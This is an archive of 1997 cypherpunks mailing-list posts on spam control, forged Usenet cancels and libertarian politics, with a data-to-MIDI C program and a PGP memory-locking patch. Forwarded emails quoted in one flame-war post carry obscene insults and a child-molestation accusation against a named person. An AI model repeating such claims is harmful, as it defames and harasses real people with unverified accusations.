> In <199707311120.MAA00669 at server.test.net>, on 07/31/97
>    at 12:20 PM, Adam Back  said:
>
> >Another longer term way to improve the situation is to charge some small
> >token amount per article, just to encourage people to use it with some
> >intelligence (use cross posts rather than separately reposting to each
> >group).
>
> This will not work!!!
>
> Charging for e-mail/news posts will no nothing to prevent spam and more
> than likely increase the noise on such lists. It is the spamers who have
> the money to post volumns of their crap. Allso I think you will find that
> it will be the fanatics who will think it worth the $$$ to get their
> message out.

In all fairness, it would decrease the "spam" because some spammers are
certain to be unwilling to pay for braodcasting the kind of crap they
now broadcast for a flat fee. However it would not eliminate the "spam"
and it would damped the "signal" more than it would damped the "noise".

In my opinion, the recipient of the "spam" should not have to pay
anything. Now, some service charge per packets transmitted or the
time spent online. Their users are therefore pushed into trying to
censor "spam", flames, or anything else they find off-topic. Even
when there's no monetary cost, some people use crappy software to
read usenet or mailing lists, and it takes them time to ignore what
they don't like, and they value their time and become angry.

> >Also, this might be an interesting information market model because
> >technical experts might even find themselves with a well paid job of
> >answering technical questions in newsgroups.
>
> There is a web site that is doing exactly this. They provide forums for
> users to post technical questions in which "experts" will answer them.
> Upon receiving the answer the person who posted the question is requested
> to rate the answer. I haven't been on the site in awhile but the last time
> I was there they were working on a mechinism to compensate their "experts"
> for answering questions. They had a point system based on the difaculty of
> the questions. After registering with them and obtaining a certain number
> of points for correctly answering questions you would be classified as an
> "expert" for that forum which then would make you eligable for
> compensation. I believe all funds were to be generated through web page
> advertisement.
>
>
> I'll see if I can find the URL for the site and post it to the list.

Most of my posts on newsgroups like nyc.food or comp.unix.questions are
answers to other people's questions.  I'd love to see this concept
extended to Usenet - sort of like "shareware".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Sat Aug  2 08:32:09 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 2 Aug 1997 23:32:09 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: <19970731100829.06883@math.uiuc.edu>
Message-ID: 



Tim Skirvin  writes:

> "Dr.Dimitri Vulis KOTM"  writes:
>
> > 1. "Spam cancellers" are not generally news admins. They are plain old
> > users who get kicked off of their ISPs for forging cancels. For examples,
> > see Net.Scum pages of Rick Buchanan, David Ritz, et al.
>
> 	Many spam cancellers are news admins.  Most of the major ones are
> admins, in fact - Chris Lewis, JEM, etc.

You're splitting hairs.  One very unpleasant cancel-forger, Jan Isley,
was the admin of a site where he was also the sole user.  When I posted
to usenet the expose's of jan's net-abuse (forged cancels) and asked
everyone to complain to his upstream site (Emory University), Jan Isley
forged cancels for 6 of my articles claiming that I "advocate harrassment
of uninvolved third parties".  Well, the third parties got complaints
anyway and pulled jan's plug in no time. :-)

For the archetypal "spam canceller", please examine Tim Brown's
net.Scum page at http://www.netscum.net/brownt0.html when that site
is up.

> > 2. Once a cancel-forger builds a "reputation" as a "spam canceller",
> > s/he often diversifies into "retromodetration" - forgng cancels for
> > singly-postd articles whose contents they don't like and claiming that
> > they were "spam". For examples, see the Net.Scum pages for Guy Macon
> > (the retromoderator on soc.religion.quaker), Chris Lewis, et al.
>
> 	This rarely happens, actually, and such situations are quickly
> slapped down as soon as they're spotted.
>
> 	The two examples Dimitri gives, of course, are major
> misrepresentations.

Who's misrepresenting what, Tim?

Chris Lewis has a 'bot that forges cancels for multi-posted articles.

Chris Lewis forges cancels by hand for articles that are critical of
him (claiming that they're "spam"), for articles that quote his earlier
articles (claiming that they violatehis copyright), posts numerous
lies about me (which you yourself partialy refutes the other day).

Tim Brown, a similar "spam canceller", forges cancels for "spam" as
well as articles that make fun of his newsletter, "The Last Word".

Etc, etc - take a look at www.netscum.net for numerous other examples.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Sat Aug  2 08:32:57 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 2 Aug 1997 23:32:57 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: <199707311120.MAA00669@server.test.net>
Message-ID: 



Just commenting on some stuff I missed earlier:

Adam Back  writes:

...
> Another longer term way to improve the situation is to charge some
> small token amount per article, just to encourage people to use it
> with some intelligence (use cross posts rather than separately
> reposting to each group).

Problem is, a "small token" for some may be a lot of money for someone
else. A poor person may be unwilling to part with 5c; a rich person or
a corporation may still be willing to spend a million dollars on an
advertising campaing (selling something or warning about the second
cumming of Jesus).  The way the things are now, everyone is equally
free to post and if you're into reputations, they can build one with
the contents of their writings, not the amount of money they can
afford to spend on posting.

> It is also entirely possible for people to have 'bots which auto-post
> in response to articles matching keywords, or matching authors.
> (We've seen a few of these on cypherpunks).
>
> If people want to make a nuisance for others by spewing random garbage
> via bots to newsgroups, they could post mega bytes of stuff per day
> and swamp the content.  What can you do about this?  Charging a small
> amount per post, or per megabyte would provide a small disincentive
> for this type of behaviour.  However it would never reflect the true
> cost to USENET bandwidth as a whole.

I'm sorry, I don't see how posting megabytes of noise every day can
swamp the content. Moreover, if such actions were indeed cause a problem,
they would not be eliminated with payments. Some people would be willing
to spend money to "flood" the net with what you consider to be "spam" -
because they're rich or because they have access to a large advertising
budget. The solution is for you to make sure you're using a reader that
lets you find the content from

A while ago I read an interesting story about the behavior of German
tourists with cars in Czech republic.  The Czechs used to discourage
their own population from 1) speeding, 2) parking in inappropriate
places by imposing fines.  The fines were a lot of money for the locals,
but small change for the Germans (because of the screwed up exchange
rates for the most part). The Germans would speed on the local roads
and park their cars where they obstructed traffic since the fines
were no deterrent.

Natrurally, there's a huge difference between an inappropriately parked
car and a Usenet article. If you can't get our of your garage because
some tourist's car is parked in your driveway, it's a problem. If a
usent article is "inappropriately posted", you can just ignore it.

> One interesting idea which has been floated on this list in the past
> is for authors to have their free posting rate moderated by other
> peoples ratings of their posts.
>
> One way to implement this is for other people to pay the author for
> their articles a penny if they like the article.  That way people who
> write things which others find interesting to read get subsidized
> posting.  Is it still free speech if you have to pay for your posts if
> you're arguing for an unpopular minority?

Now that is another very interesting suggestion from Adam.

Instead of discouraging the behavior you don't like, encourage the
behavior you do like.

A shareware-like concept - send e-cash donations to the posters of
usenet articles that you like and whom you want to encourage.

Make 1 cent the standard "tip" for an article that you read and liked.
Feel free to send more if you like an article a lot. Don't send anything
if you don't like the article or if you've killfiled the author.

> Also, this might be an interesting information market model because
> technical experts might even find themselves with a well paid job of
> answering technical questions in newsgroups.

Or the ones who post good porn in alt.binaries.pictures.erotica.
Reward the ones whose postings others do want to read. Yes,
an excellent idea if you can work out the details.

I invite Adam and David to subscribe to the freedom-knights mailing list
(send 'subscribe freedom-knights at jetcafe.org' to majordomo at jetcafe.org)
if you want to continue this not-quite-crypto discussion there.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Sat Aug  2 08:37:04 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 2 Aug 1997 23:37:04 +0800
Subject: Entrust Technologies's Solo - free download
In-Reply-To: <19970731101458.59875@math.uiuc.edu>
Message-ID: 



Tim Skirvin  writes:

> "Dr.Dimitri Vulis KOTM"  writes:
>
> > Paul Pomes is a fouil-mouthed liar.  Please see his Net.Scum page at
> > http://www.netscum.net/pomesp0.html.
>
> 	What, you mean "Paul B. Pomes, ppomes at qualcomm.com, former
> p-pomes at uiuc.edu, mailbombs posters and their upstream sites with
> obscenities and false complaints."  That's the best you guys can do -
> complain about obscenities and 'false complaints'?
>
> 	You guys don't know Paul very well, do you?

The people on the Cypherpunks mailing list know Paul Pomes as a member of
Gary Burnore's databasix gang who has been complaining to remailer
operators' upstream sites and employers (such as Jeff Burchell).

Here are some of the e-mails I've received from Paul Pomes:

]From ppomes at Qualcomm.com  Mon May  5 15:42:15 1997
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Mon, 05 May 97 16:07:50 EDT
]	for dlv
]Received: from zelkova.qualcomm.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA05094 for dlv at bwalk.dm.com; Mon, 5 May 97 15:42:15 -0400
]Received: from localhost (localhost [127.0.0.1])
]	by zelkova.qualcomm.com (8.8.5/8.8.5) with ESMTP id MAA04331
]	for ; Mon, 5 May 1997 12:42:12 -0700 (PDT)
]X-Mailer: exmh version 2.0gamma 1/27/96
]To: dlv at bwalk.dm.com
]From: Paul Pomes 
]Organization: Qualcomm, Inc.
]Mime-Version: 1.0
]Content-Type: text/plain; charset=us-ascii
]Date: Mon, 05 May 1997 12:42:11 -0700
]Message-Id: <4328.862861331 at zelkova.qualcomm.com>
]Sender: ppomes at Qualcomm.com
]
]I take this all to mean that you are Master Cocksucker Dimwit Vulis?
]After all I was always taught to consider the source.
[my totally unrelated cypherpunks article snipped]

Paul Pomes sends me harrassing e-mail and quotes more obscenities from
the anonymous remailers:


]From ppomes at Qualcomm.com  Mon May  5 14:34:22 1997
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Mon, 05 May 97 16:07:56 EDT
]	for dlv
]Received: from zelkova.qualcomm.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA29061 for dlv at bwalk.dm.com; Mon, 5 May 97 14:34:22 -0400
]Received: from localhost (localhost [127.0.0.1])
]	by zelkova.qualcomm.com (8.8.5/8.8.5) with ESMTP id LAA04164
]	for ; Mon, 5 May 1997 11:34:15 -0700 (PDT)
]X-Mailer: exmh version 2.0gamma 1/27/96
]To: dlv at bwalk.dm.com
]From: Paul Pomes 
]Organization: Qualcomm, Inc.
]X-Url: 
]Mime-Version: 1.0
]Content-Type: text/plain; charset=us-ascii
]Date: Mon, 05 May 1997 11:34:15 -0700
]Message-Id: <4161.862857255 at zelkova.qualcomm.com>
]Sender: ppomes at Qualcomm.com
]
]My alias of dimwit for you is appropriate.
]------- Forwarded Message
]
]Date:    Sun, 04 May 1997 13:39:11 +0200
]From:    nobody at replay.com (Anonymous)
]To:      cypherpunks at toad.com
]Subject: Re: Firewalls
]
]Timmy Mayo the self-admitted child molester
]possesses a rudimentary dick less than one
]inch long, half the size of his mother's
]clitoris, that barely makes a fistful. Thereby
]hangs the root of this Jew-hating sissy's sick
]fixation on little boys and Usenet forgeries.
]
]         \|||/
]         (o o)
]     -ooO-(_)-Ooo- Timmy Mayo
]
]
]------- End of Forwarded Message
]
]



]From ppomes at Qualcomm.com  Wed May  7 17:27:20 1997
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Wed, 07 May 97 19:18:55 EDT
]	for dlv
]Received: from zelkova.qualcomm.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA21866 for dlv at bwalk.dm.com; Wed, 7 May 97 17:27:20 -0400
]Received: from localhost (localhost [127.0.0.1])
]	by zelkova.qualcomm.com (8.8.5/8.8.5) with ESMTP id OAA08611
]	for ; Wed, 7 May 1997 14:26:32 -0700 (PDT)
]X-Mailer: exmh version 2.0gamma 1/27/96
]To: dlv at bwalk.dm.com
]From: Paul Pomes 
]Organization: Qualcomm, Inc.
]X-Url: 
]Mime-Version: 1.0
]Content-Type: text/plain; charset=us-ascii
]Date: Wed, 07 May 1997 14:26:31 -0700
]Message-Id: <8608.863040391 at zelkova.qualcomm.com>
]Sender: ppomes at Qualcomm.com
]
]And you fancy yourself a human being.  We all have our illusions.
]
]------- Forwarded Message
]
]Date:    Tue, 06 May 1997 03:14:52 -0400
]From:    lucifer at dhp.com (lucifer Anonymous Remailer)
]To:      cypherpunks at toad.com
]Subject: PGP
]
]Tim C[retin] Mayflower styles his facial hair to look more
]like pubic hair.
]
]      ,,,
] -ooO(o o)Ooo- Tim C[retin] Mayflower
]      (_)
]
]
]------- End of Forwarded Message
]


Please tell me, Tim, why you disagree with Paul's description on his
Net.Scum page.


I'm posting this for the record to the F-K list, so people are aware
of the kind of behavior Tim Skirvin condones in his friends.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Sat Aug  2 08:39:20 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 2 Aug 1997 23:39:20 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: <19970731090023.27288@math.uiuc.edu>
Message-ID: 



Tim Skirvin  writes:

>
> Ryan Anderson  writes:
>
> > "Make Money Fast" are killed because they're illegal scams in the US and I
> > think in most of the world.
>
> 	Make.Money.Fast is killed because it's spam a few thousand times
> over.  The legality of it doesn't come into question.

Look in your "control" newsgroup, and you'll see that most of the
cancels forged for the MMFs state in the body that they're being
cancelled because they're "illegal". To save bandwidth, here's one
counterexample to Tim's claim:

]Path: ...!newsfeed.internetmci.com!news.msfc.nasa.gov!cyberspam!not-for-mail
]From: news at news.msfc.nasa.gov
]Newsgroups: sci.physics
]Subject: cmsg cancel <32684BAE.68B3 at computer.mic> no reply ignore
]Message-ID: 
]Date: Sat, 19 Oct 1996 15:07:31 GMT
]Control: cancel <32684BAE.68B3 at computer.mic>
]Sender: listentome 
]Reply-To: bitbucket at news.msfc.nasa.gov
]Organization: Semi-Automatic Chain Letter Remover
]Lines: 3
]Approved: news at news.msfc.nasa.gov
]X-No-Archive: Yes
]X-Canceled-by: news at news.msfc.nasa.gov
]
]ignore
]
]Illegal MMF canceled by news at news.msfc.nasa.gov

You will notice that the anonymous cancel came from a .gov site. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From kent at songbird.com  Sat Aug  2 09:49:04 1997
From: kent at songbird.com (Kent Crispin)
Date: Sun, 3 Aug 1997 00:49:04 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: <199707311120.MAA00669@server.test.net>
Message-ID: <19970802092944.06562@bywater.songbird.com>



On Sat, Aug 02, 1997 at 09:31:20AM -0500, Dr.Dimitri Vulis KOTM wrote:
> Just commenting on some stuff I missed earlier:
> 
> Adam Back  writes:
> 
> ...
> > Another longer term way to improve the situation is to charge some
> > small token amount per article, just to encourage people to use it
> > with some intelligence (use cross posts rather than separately
> > reposting to each group).
> 
> Problem is, a "small token" for some may be a lot of money for someone
> else. A poor person may be unwilling to part with 5c; a rich person or
> a corporation may still be willing to spend a million dollars on an
> advertising campaing (selling something or warning about the second
> cumming of Jesus).  
>
> The way the things are now, everyone is equally
> free to post and if you're into reputations, they can build one with
> the contents of their writings, not the amount of money they can
> afford to spend on posting.

In more general terms: A "free market" fundamentally grants more
control to those with more money.  Postage of whatever variety turns
the medium over to those with more money.  That would, in my opinion, 
fundamentally alter the character of email in a strongly negative 
direction. 

This, by the way, is one of the fundamental problems with the
proposition that a free market is the appropriate response to every
social issue -- in many arenas a broad primary goal is allowing equal
opportunity to each individual.  

In a "free market" a fundamental feedback loop is that inequality of
distribution of wealth increases -- this obviously follows from the
fact that it is easier to make money if you have money.  With wealth
goes control.  Thus, the ultimate end of completely unfettered free
markets is fascism, where the wealthy run the government.  This is
another manifestation of the fundamental conflict between democratic
ideals and unfettered free markets. 

Naturally, rich, indolent technologists tend to favor schemes that 
will put them in control. :-)

[...]

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From paul at fatmans.demon.co.uk  Sat Aug  2 11:44:23 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Sun, 3 Aug 1997 02:44:23 +0800
Subject: free market services vs monopoly government
In-Reply-To: <19970802015614.65348@bywater.songbird.com>
Message-ID: 




> But your reasoning is this, apparently: "Kent says he doesn't believe
> it is possible for a human society to not have a government, therefore
> Kent favors big intrusive government." This kind of "reasoning" is
> rife on cypherpunks; may I suggest it is beneath you?

I don`t think this is a necessarily entirely spurious line of reasoning, 
all government leads to large and intrusive government, it is the nature 
of power that it corrupts and is addictive. So the statement above could 
be corrected to "Kent says he doesn`t believe it is possible for a human 
society to not have a government, therefore Kent favours a system which 
would eventually "evolve" into big intrusive government".
Anyway, the argument over anarchism vs. minarchism comes down very much 
to how you define government, if you define government as a body of 
people given the power to pass laws over the citizens of that 
jurisdiction, then government is indeed a bad thing per se, however, if 
you define government as a loose informal set of social norms and codes 
of behaviour (for a libertarian example see the NAP) then government is 
indeed present in all civilised and succesful human societies, real or 
conjectured.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From kent at songbird.com  Sat Aug  2 12:16:06 1997
From: kent at songbird.com (Kent Crispin)
Date: Sun, 3 Aug 1997 03:16:06 +0800
Subject: RSA - the song
In-Reply-To: <199708011035.LAA01061@server.test.net>
Message-ID: <19970802120226.07980@bywater.songbird.com>

On Fri, Aug 01, 1997 at 11:35:02AM +0100, Adam Back wrote:
[...]
> 
> print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 
> > I dug out a midi interpreter I wrote a number of years ago, 
> > and it is indeed trivial to modify it to read any text as input.  
> > Unfortunately, I wrote that long before the midi file spec was 
> > finalized, and the hardware I wrote it for is also long gone.  But 
> > it's probably not much work to get file output working again...and 
> > the thought of a general text-to-midi translator is rather 
> > entertaining -- I could play this entire mail message through it, for 
> > example... It would definitely make better music if some rhythmic 
> > variation was part of the coding, but that would make it a little 
> > harder to make an automatic decoder...
> 
> I'd find it most cool to hear an audio file of the above.

Well, I generated a midi file that encodes music which in turn is a 
direct algorithmic encoding of your program.  I didn't have a 
convenient way to go to a direct sound file, but midi players are 
very widely available -- any recent pc with a sound card will have a 
"multimedia midi jukebox" or something like that.  And there are 
probably free ones on the net -- I didn't look.  The midi file will 
be a mime attachment to this message.  It's also at 

	ftp://songbird.com/pub/rsa.mid 

For aesthetic reasons I modified the encoding from the simple one
mentioned earlier, and, rather than try to modify one of my earlier
midi programs, I just hacked this one out from other sources.  The
program will actually encode any binary data into a piece of music. 

I think that musically the piece is actually somewhat interesting -- I
kind of like it.  Like the source text, it is rather dense.  But if
you listen to it a few times patterns and phrasing will appear.  It 
sounds like reasonable avante garde music, actually -- something a 
college radio station might broadcast to the world late at night...

The program is really rather trivial, so rather than describing the 
encoding, I am just appending it to this message.

--------------------------------------------------------------------
/*
    dtom -- convert data to midi
        dtom midifile 
#include 
#include "midifile.h"

#define ROOT 36

FILE *fp;

/* offsets for three octaves of diatonic major scale */
int scale[] = {0,2,4,5,7,9,11,12,14,16,17,19,23,24,26,28,29,31,33,35,36};

mputc(c) { return(putc(c,fp));}

int writetrack(track)
int track;
{
    int note_duration;
    int rest_duration;
    int high_nybble;
    int low_nybble;
    char c;
    char n1[2];
    char n2[2];

    mf_write_tempo((long)100000);

    while( (c = getchar()) != EOF ) {

        high_nybble = (c>>4) & 0xf;
        low_nybble  = c & 0xf;
	
	/* low note */
        n1[0] = scale[low_nybble]+ROOT;	/* note number */
        n1[1] = 64;                     /* velocity */

	/* high note */
        n2[0] = scale[high_nybble]+ROOT+scale[16];
        n2[1] = 64;

	/* shouldn't happen */
	if( n1[0] >= n2[0] ) printf("warning -- voice crossover!\n");

	/* note_duration needs to be long enough for pitch detectors */
	note_duration = 120*((c&15) + 4);
	rest_duration = 120*(((c>>5)&3));

        if(!mf_write_midi_event(rest_duration,note_on,1,n1,2)) 	return(-1);
        if(!mf_write_midi_event(0,note_on,1,n2,2))		return(-1);

        if(!mf_write_midi_event(note_duration,note_off,1,n1,2))	return(-1);
        if(!mf_write_midi_event(0,note_off,1,n2,2))		return(-1);
    }

    return(1);
} /* end of write_track() */

main(argc,argv)
char **argv;
{
    if( !(fp = fopen(argv[1],"w")) ) exit(1);

    Mf_putc = mputc;
    Mf_writetrack = writetrack;
    mfwrite(0,1,480,fp);
}

---------------------------------------------------------------------------


-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html

-------------- next part --------------
A non-text attachment was scrubbed...
Name: bin00000.bin
Type: application/octet-stream
Size: 2646 bytes
Desc: "rsa.mid"
URL: 

From aba at dcs.ex.ac.uk  Sat Aug  2 12:33:55 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 3 Aug 1997 03:33:55 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <19970802092944.06562@bywater.songbird.com>
Message-ID: <199708021921.UAA06401@server.test.net>




Kent Crispin  writes:
> In more general terms: A "free market" fundamentally grants more
> control to those with more money.  Postage of whatever variety turns
> the medium over to those with more money.  That would, in my opinion, 
> fundamentally alter the character of email in a strongly negative 
> direction. 

OK, lets say we make emails free, unmetered, but they _must_ include a
valid token for 0c.  (OK Dimitri?)

Next we choose a threshold say 1000 posts per day.  Seems hard to
imagine anyone generating manually over 1000 emails per day.  That's
more than 1 per minute for a 10 hour day.

Next when you sign up for this new email postage system, you have to
hand over a $100 deposit.  The 0c payments are anonymous.  But if you
spend over 1000 of them in one day, your identity becomes known (via a
mechanism like that used for Chaum's off-line double spending
detection protocol).  You loose $100.  To you, the spammer, the posts
cost 10c each.  Your account is disabled until you pay another $100.


However there are a number of practical problems with the above scheme:

- How do we stop spammers buying unwanted 0c postage stamps from
people for under 10c a stamp?

- Sounds like an online protocol, will be high bandwidth requirements
at the bank(s)

- How do we stop banks cheating and spamming or selling spammers
postage more cheaply

Doesn't look like it could work, unless anyone has any ideas to fix-up
a distributed protocol which can acheive something like this, and
preserve anonymity at the same time.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



Interesting.

Now for the obvious question, can you convert midi back to text?

Looks like a new way to hide encrypted messages.

amp

------------------------
  From: Kent Crispin 
  Subject: RSA - the song 
  Date: Sat, 02 Aug 1997 12:02:26 -0700 
  To: cypherpunks at cyberpass.net, coderpunks at toad.com


> On Fri, Aug 01, 1997 at 11:35:02AM +0100, Adam Back wrote:
> [...]
> > 
> > print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
> > )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 > 
> > > I dug out a midi interpreter I wrote a number of years ago, 
> > > and it is indeed trivial to modify it to read any text as input.  
> > > Unfortunately, I wrote that long before the midi file spec was 
> > > finalized, and the hardware I wrote it for is also long gone.  But 
> > > it's probably not much work to get file output working again...and 
> > > the thought of a general text-to-midi translator is rather 
> > > entertaining -- I could play this entire mail message through it, for 
> > > example... It would definitely make better music if some rhythmic 
> > > variation was part of the coding, but that would make it a little 
> > > harder to make an automatic decoder...
> > 
> > I'd find it most cool to hear an audio file of the above.
> 
> Well, I generated a midi file that encodes music which in turn is a 
> direct algorithmic encoding of your program.  I didn't have a 
> convenient way to go to a direct sound file, but midi players are 
> very widely available -- any recent pc with a sound card will have a 
> "multimedia midi jukebox" or something like that.  And there are 
> probably free ones on the net -- I didn't look.  The midi file will 
> be a mime attachment to this message.  It's also at 
> 
> 	ftp://songbird.com/pub/rsa.mid 
> 
> For aesthetic reasons I modified the encoding from the simple one
> mentioned earlier, and, rather than try to modify one of my earlier
> midi programs, I just hacked this one out from other sources.  The
> program will actually encode any binary data into a piece of music. 
> 
> I think that musically the piece is actually somewhat interesting -- I
> kind of like it.  Like the source text, it is rather dense.  But if
> you listen to it a few times patterns and phrasing will appear.  It 
> sounds like reasonable avante garde music, actually -- something a 
> college radio station might broadcast to the world late at night...
> 
> The program is really rather trivial, so rather than describing the 
> encoding, I am just appending it to this message.
> 
> --------------------------------------------------------------------
> /*
>     dtom -- convert data to midi
>         dtom midifile              or
>         datasource | dtom midifile
> 
>         convert standard in to a midi representation of the data, and
>         write it to a standard midi file.  The midi data is designed
>         to so that the sound produced will permit decoding by a pitch
>         to midi device.  Two things are done to increase the musical
> 	interest:  First, the notes are selected from a diatonic 
> 	scale, instead of a chromatic.  And second, the rhythm is 
>         also varied algorithmically -- any decoding from the sound 
>         should ignore all rhythmic variation.
> 
> 	Code uses "midifilelib" from Tim Thompson & Michael 
> 	Czeiszperger, and is cobbled from one of their examples.
> 
> */
>     
> 
> #include 
> #include 
> #include "midifile.h"
> 
> #define ROOT 36
> 
> FILE *fp;
> 
> /* offsets for three octaves of diatonic major scale */
> int scale[] = {0,2,4,5,7,9,11,12,14,16,17,19,23,24,26,28,29,31,33,35,36};
> 
> mputc(c) { return(putc(c,fp));}
> 
> int writetrack(track)
> int track;
> {
>     int note_duration;
>     int rest_duration;
>     int high_nybble;
>     int low_nybble;
>     char c;
>     char n1[2];
>     char n2[2];
> 
>     mf_write_tempo((long)100000);
> 
>     while( (c = getchar()) != EOF ) {
> 
>         high_nybble = (c>>4) & 0xf;
>         low_nybble  = c & 0xf;
> 	
> 	/* low note */
>         n1[0] = scale[low_nybble]+ROOT;	/* note number */
>         n1[1] = 64;                     /* velocity */
> 
> 	/* high note */
>         n2[0] = scale[high_nybble]+ROOT+scale[16];
>         n2[1] = 64;
> 
> 	/* shouldn't happen */
> 	if( n1[0] >= n2[0] ) printf("warning -- voice crossover!\n");
> 
> 	/* note_duration needs to be long enough for pitch detectors */
> 	note_duration = 120*((c&15) + 4);
> 	rest_duration = 120*(((c>>5)&3));
> 
>         if(!mf_write_midi_event(rest_duration,note_on,1,n1,2)) 	return(-1);
>         if(!mf_write_midi_event(0,note_on,1,n2,2))		return(-1);
> 
>         if(!mf_write_midi_event(note_duration,note_off,1,n1,2))	return(-1);
>         if(!mf_write_midi_event(0,note_off,1,n2,2))		return(-1);
>     }
> 
>     return(1);
> } /* end of write_track() */
> 
> main(argc,argv)
> char **argv;
> {
>     if( !(fp = fopen(argv[1],"w")) ) exit(1);
> 
>     Mf_putc = mputc;
>     Mf_writetrack = writetrack;
>     mfwrite(0,1,480,fp);
> }
> 
> ---------------------------------------------------------------------------
> 
> 
> -- 
> Kent Crispin				"No reason to get excited",
> kent at songbird.com			the thief he kindly spoke...
> PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
> http://songbird.com/kent/pgp_key.html
> 

---------------End of Original Message-----------------

------------------------
Name: amp
E-mail: amp at pobox.com
Date: 08/02/97
Time: 16:46:07
Visit me at http://www.pobox.com/~amp

'Drug Trafficking Offense' is the root passphrase to the Constitution.

Have you seen 
http://www.public-action.com/SkyWriter/WacoMuseum
------------------------






From dm0 at avana.net  Sat Aug  2 15:28:41 1997
From: dm0 at avana.net (David Miller)
Date: Sun, 3 Aug 1997 06:28:41 +0800
Subject: PGP 5.0b11 feedback / PGP Linux memlock patch
Message-ID: <33E3B246.2C983092@avana.net>

Guys,

Here's a patch for PGP 2.6.2 (and 2.6.3i) source which locks all
process pages in memory (will not swap to disk) under Linux if
the user is running with effective root privilege.  You might
consider putting something like this in PGP 5.0.  Also, this
patch should be generalizable to POSIX systems withthe mlockall(2)
function.  If you have any success in generalizing it to POSIX,
please let me know, as I only have access to Linux.

See 'man memlockall' for more info.

--David Miller

-- 
I'll take a smart dog over a dumb person any day.


Begin3
Title:		pgp-memlock.pat
Version:	25JUL97
Entered-date:	25JUL97
Description:	Patch for Linux PGP 2.6.2 and PGP 2.6.3i source to lock all
		pages in physical memory if running with root privilege.

		This keeps sensitive data from being swapped to disk, where
		it could be later recovered by undesirables.

		There is no effect if not run with effective root privilege.
		Root privs are immediately dismissed, allowing pgp to be
		safely installed SUID root (assuming its chmod'ed 4111).
		pgp.c is modified, increasing executable size by ~391 bytes.

Keywords:	PGP, encryption, security, Linux
Author: 	dm0 at avana.net (David Miller)
Maintained-by:	dm0 at avana.net (David Miller)
Primary-site:	sunsite.unc.edu  /pub/Linux/apps/crypto/pgp-memlock.pat
Alternate-site: Galactus
Original-site:	Coderpunks list
Platforms:	Linux
Copying-policy:	GPL
End


*** src/pgp.c	Sat Jul 26 01:25:57 1997
--- src/pgp.c.new	Sat Jul 26 01:25:50 1997
***************
*** 111,116 ****
--- 111,120 ----
  #include 
  #include 
  #include 
+ #ifdef linux
+ #include 	/* for David Miller's memory lock patch */
+ #include 	/* for David Miller's memory lock patch */
+ #endif
  
  #ifdef __QNX__
  #include 
***************
*** 435,440 ****
--- 439,457 ----
  #ifdef	DEBUG1
      verbose = TRUE;
  #endif
+ 
+ /* David Miller's memory lock patch */
+ #ifdef linux					/* Linux only, for now */
+     if (geteuid() == 0) {			/* if we have root privs */
+         /* lock all current & future pages in physical memory */
+ 	if (mlockall(MCL_CURRENT|MCL_FUTURE) < 0)
+ 		fprintf(pgpout, LANG("\007Could not lock all pages in memory.\n"));
+ 	if (setuid(getuid()) < 0)		/* drop root privs */
+ 		fprintf(pgpout, LANG("\007Could not drop root priviliges.\n"));
+     }
+ #endif
+ /* end David Miller's memory lock patch */
+ 
      /* The various places one can get passwords from.
       * We accumulate them all into two lists.  One is
       * to try on keys only, and is stored in no particular




From bpettigrew at usa.net  Sat Aug  2 16:25:39 1997
